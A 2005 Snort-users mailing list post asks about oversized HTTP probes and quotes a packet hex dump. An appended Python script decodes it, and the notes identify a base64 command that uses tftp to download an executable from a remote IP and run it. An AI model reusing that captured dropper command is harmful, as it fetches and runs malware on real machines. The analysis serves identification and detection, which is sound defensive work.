[Snort-users] [http-inspect/SPNEGO]

Gregory D Hough mr6re9 at ...6025...
Mon Jun 20 09:19:09 EDT 2005


Gregory D Hough wrote:

> Snortsters,
>
> I have been getting gobs of OVERSIZE REQUEST-URI DIRECTORY alerts 
> lately, since about June 03. HTTPD would answer these requests with a 
> code 200 and serve my index page. I didn't like that so I configured 
> Apache to respond with a 400 by use of the directive 
> LimitRequestFieldsize 2048. Since then these requests have been 
> morphing whereby the continuation packet size has been growing and 
> shrinking.
>
> Am I just losing my marbles? What is this thing anyway? Do I have 
> packets? Yes, lots.
>
> Thanks,
> farmer6re9

I realize this is just a little insignificant $HOME_NET I'm watching 
here. And that I probably don't have to worry about this goonine tool 
poking around, but I am curious as to what it is. Especially when the 
probes have increased fourfold in the last week. They generally all look 
much the same except in this portion of a continuation packet:

0130  74 5a 43 41 76 59 79 42 30 5a 6e 52 77 49 43 31   tZCAvYyB0ZnRwIC1
0140  70 49 44 49 79 4d 43 34 78 4f 44 67 75 4d 54 51   pIDIyMC4xODguMTQ
0150  34 4c 6a 45 79 4e 53 42 48 52 56 51 67 64 32 4e   4LjEyNSBHRVQgd2N
0160  7a 62 6d 5a 30 65 53 35 6c 65 47 55 6d 63 33 52   zbmZ0eS5leGUmc3R
0170  68 63 6e 51 67 64 32 4e 7a 62 6d 5a 30 65 53 35   hcnQgd2NzbmZ0eS5
0180  6c 65 47 55 6d 5a 58 68 70 64 41 42 43 51 6b 4a   leGUmZXhpdABCQkJ
0190  43 51 6b 4a 43 51 6b 4a 43 51 6b 4a 43 51 6b 4a   CQkJCQkJCQkJCQkJ

Does it have a name so I can google-it? I'd call it POKER-FACE because 
of all the Queen-King-Jack-Cards in its Data-Deck.

Please help, I'm getting straight flushed.

Thanks,
farmer6re9
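The ASCII column of the dump quoted above is a run of base64, and the capture starts partway through a 4-character base64 group, which is why the text looks like random playing cards. The Python below is an added example, not part of the original post and not Snort code: it rebuilds the raw bytes from the hex column, tries all four possible base64 alignments, and keeps the one that decodes to something text-like. The function names and the text-likeness heuristic are my own; the only input is the seven lines quoted above, embedded here as the constructed sample. Decoding shows the fragment is the tail of a Windows shell command line that fetches an executable with tftp and starts it, followed by a NUL and filler bytes; the filename and the command string are the handles to search on, or to turn into a content match, which is the defensive use.

```python
import base64
import re
import string

# Constructed sample input: the seven continuation-packet lines quoted in
# the post above, copied verbatim (offset, sixteen hex bytes, ASCII column).
HEXDUMP = """\
0130  74 5a 43 41 76 59 79 42 30 5a 6e 52 77 49 43 31   tZCAvYyB0ZnRwIC1
0140  70 49 44 49 79 4d 43 34 78 4f 44 67 75 4d 54 51   pIDIyMC4xODguMTQ
0150  34 4c 6a 45 79 4e 53 42 48 52 56 51 67 64 32 4e   4LjEyNSBHRVQgd2N
0160  7a 62 6d 5a 30 65 53 35 6c 65 47 55 6d 63 33 52   zbmZ0eS5leGUmc3R
0170  68 63 6e 51 67 64 32 4e 7a 62 6d 5a 30 65 53 35   hcnQgd2NzbmZ0eS5
0180  6c 65 47 55 6d 5a 58 68 70 64 41 42 43 51 6b 4a   leGUmZXhpdABCQkJ
0190  43 51 6b 4a 43 51 6b 4a 43 51 6b 4a 43 51 6b 4a   CQkJCQkJCQkJCQkJ
"""

B64_CHARS = frozenset(string.ascii_letters + string.digits + "+/")
# Bytes we are willing to call "text": printable ASCII plus tab/CR/LF.
TEXTLIKE = frozenset(bytes(range(0x20, 0x7F)) + b"\t\r\n")


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild raw bytes from the hex column of an Ethereal/tcpdump-style dump.

    Columns are separated by two or more spaces (offset / hex bytes / ASCII),
    so splitting on that keeps the ASCII rendering out of the byte stream."""
    raw = bytearray()
    for line in dump.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 2 or not re.fullmatch(r"[0-9a-fA-F]+", cols[0]):
            continue
        raw.extend(int(h, 16) for h in cols[1].split())
    return bytes(raw)


def decode_base64_fragment(data: bytes):
    """Decode a base64 run that was captured mid-stream.

    A continuation packet can begin anywhere inside a 4-character group, so
    every alignment (skip 0..3 leading characters) is tried and the one whose
    output has the highest share of text-like bytes wins.
    Returns (skip, decoded_bytes, text_ratio)."""
    run = "".join(c for c in data.decode("ascii", errors="replace") if c in B64_CHARS)
    best = (-1.0, None, b"")
    for skip in range(4):
        chunk = run[skip:]
        if len(chunk) % 4 == 1:          # a lone trailing char carries no whole byte
            chunk = chunk[:-1]
        chunk += "=" * (-len(chunk) % 4)  # restore the padding the wire never sent
        try:
            decoded = base64.b64decode(chunk, validate=True)
        except ValueError:
            continue
        if not decoded:
            continue
        ratio = sum(b in TEXTLIKE for b in decoded) / len(decoded)
        if ratio > best[0]:
            best = (ratio, skip, decoded)
    ratio, skip, decoded = best
    return skip, decoded, ratio


def analyse(dump: str) -> dict:
    """Summarise what the captured fragment decodes to."""
    skip, decoded, ratio = decode_base64_fragment(hexdump_to_bytes(dump))
    text = decoded.decode("ascii", errors="replace")
    command, _, tail = text.partition("\x00")  # command line ends at the NUL
    return {
        "skip": skip,
        "text_ratio": ratio,
        "decoded": text,
        "command": command,
        "filler_bytes": len(tail),
        "uses_tftp": "tftp -i" in command,
    }


if __name__ == "__main__":
    result = analyse(HEXDUMP)
    print(f"alignment skip={result['skip']}  text-like={result['text_ratio']:.2f}")
    print("command fragment:", repr(result["command"]))
    print("filler bytes after NUL:", result["filler_bytes"])
```

The first captured character belongs to a group that was cut off by the packet boundary, so the decoded command starts mid-word; everything from the `/c` onward is intact. Run it with `python3 decode_fragment.py` on the dump as pasted; it works the same on any dump in this layout, not just the one above.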